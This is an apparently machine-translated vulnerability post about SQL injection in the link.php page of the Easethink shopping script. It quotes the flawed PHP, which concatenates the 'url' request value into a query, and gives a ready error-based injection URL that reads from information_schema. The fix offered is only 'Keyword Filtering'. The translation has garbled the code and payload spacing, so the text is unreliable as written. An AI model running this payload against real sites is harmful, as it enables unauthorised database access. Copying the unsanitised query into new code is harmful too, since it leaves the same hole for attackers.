Originally, I wrote about the easy-to-use shopping SQL injection vulnerability today. I 'd like to find some request variables. If you find that the link page also seems to have a loose filtering error, open the code and check out the problem. The Code on the link. php page is as follows:
If ($ _ REQUEST ['ac'] = 'Go') // link label go {$ url = ($ _ REQUEST ['url']); // The url value is directly taken into the SQL query statement $ link_item = $ GLOBALS ['db']-> getRowCached ("select * from ". DB_PREFIX. "link where (url = '". $ url. "'or url = 'HTTP ://". $ url. "') and is_effect = 1"); // if ($ link_item) {if (check_ipop_limit (get_client_ip (), "Link", 10, $ link_item ['id']) $ GLOBALS ['db']-> query ("update ". DB_PREFIX. "link set count = count + 1 where id = ". $ link_item ['id']); $ url = "http ://". $ url;} else {$ url = APP_ROOT. "/";} app_redirect ($ url );}
Can you see it clearly? Try www.2cto.com/exptest/easethink/link. php? Act = go & city = sanming & url = 'and (select % 201% 20 from (select % 20 count (*) % 2 cconcat (select % 20 concat (CHAR (52) % 2 cCHAR (67) % 2 cCHAR (117) % 2 cCHAR (68) % 2 cCHAR (98) % 2 cCHAR (104) % 2 cCHAR (67) % 2 cCHAR (77) % 2 cCHAR (99) % 2 cCHAR (77) % 2 cCHAR (81) % 20 from % 20information_schema.tables % 20 limit % 200% 2c1) % 2 cfloor (rand (0) * 2) x % 20 from % 20information_schema.tables % 20 group % 20by % 20x))
Solution:
Keyword Filtering